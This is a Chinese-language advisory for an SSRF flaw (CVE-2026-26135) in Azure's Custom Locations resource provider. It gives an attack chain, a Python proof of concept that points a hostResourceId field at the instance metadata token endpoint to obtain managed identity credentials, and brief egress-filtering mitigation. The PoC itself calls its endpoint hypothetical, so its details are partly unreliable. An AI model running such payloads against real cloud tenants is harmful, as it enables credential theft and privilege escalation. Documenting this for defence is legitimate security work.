CVE-2026-26135 Azure自定义位置资源提供程序SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-26135

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Azure Custom Locations Resource Provider

漏洞概述

CVE-2026-26135是Azure自定义位置资源提供程序中发现的一个严重安全漏洞。该漏洞源于服务端请求伪造（SSRF），未经严格验证的输入允许已授权的攻击者诱导服务端向非预期目标发起请求。攻击者可利用此缺陷在云网络内部进行横向移动并提升权限。鉴于其CVSS评分高达9.6，且攻击无需用户交互，该漏洞对云环境的机密性和完整性构成极高威胁，需引起高度关注。

技术细节

该漏洞的核心在于Azure自定义位置资源提供程序未能对用户输入的URL参数或资源标识符进行严格的校验和过滤。攻击者利用低权限账户，向资源提供程序发送特制的HTTP请求，其中包含指向内部受保护资源的恶意URL。由于服务端信任该请求，代为访问了攻击者指定的地址（例如Azure Instance Metadata Service 169.254.169.254或其他内部服务端点）。攻击者通过分析响应数据，获取临时凭证、敏感配置信息或进行内网端口扫描。进而利用这些高权限信息执行未授权操作。由于攻击发生在服务端，且利用了资源提供程序的高权限上下文，攻击者成功绕过了网络边界防御，实现了从低权限账户到高特权控制权的跨越，对系统的机密性和完整性造成了不可逆的影响。

攻击链分析

STEP 1

1. 获取初始访问权限

攻击者获得Azure环境中的低权限账户凭证或访问令牌。

STEP 2

2. 构造恶意请求

攻击者利用Azure Custom Locations API，在请求参数中注入指向内部敏感资源（如IMDS 169.254.169.254）的URL。

STEP 3

3. 触发SSRF

资源提供程序（RP）解析请求并作为服务端向攻击者指定的内部地址发起连接，导致SSRF。

STEP 4

4. 权限提升与数据窃取

攻击者通过RP获取的内部响应（如Managed Identity凭证）提升权限，进而控制云资源或窃取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# This is a demonstration PoC for the SSRF vulnerability in Azure Custom Locations RP.
# Attackers use a low-privilege token to send a malicious request containing an internal URL.

# Target endpoint (Hypothetical based on the product name)
target_url = "https://management.azure.com/subscriptions/{subscription_id}/resourceGroups/{rg}/providers/Microsoft.ExtendedLocation/customLocations/{location_name}?api-version=2021-08-31-preview"

# Malicious internal URL (e.g., Azure Instance Metadata Service)
# The goal is to force the RP to access this internal endpoint
ssrf_payload = {
    "properties": {
        "hostResourceId": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.core.windows.net/"
    }
}

# Headers with a stolen or low-privilege bearer token
headers = {
    "Authorization": "Bearer <LOW_PRIV_TOKEN>",
    "Content-Type": "application/json"
}

try:
    # Sending the malicious request
    response = requests.put(target_url, json=ssrf_payload, headers=headers)
    
    # Checking if the SSRF was triggered (e.g., by response time or leaked metadata)
    if response.status_code == 200 or response.status_code == 202:
        print("[+] Request sent successfully. Check for SSRF indicators.")
        print("[+] Response Body:", response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Azure Custom Locations Resource Provider (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

在未应用补丁前，建议在网络层面实施严格的出站流量控制，阻止资源提供程序访问非必要的内部网络段（特别是169.254.169.254等元数据服务），并加强对API请求的异常行为监测。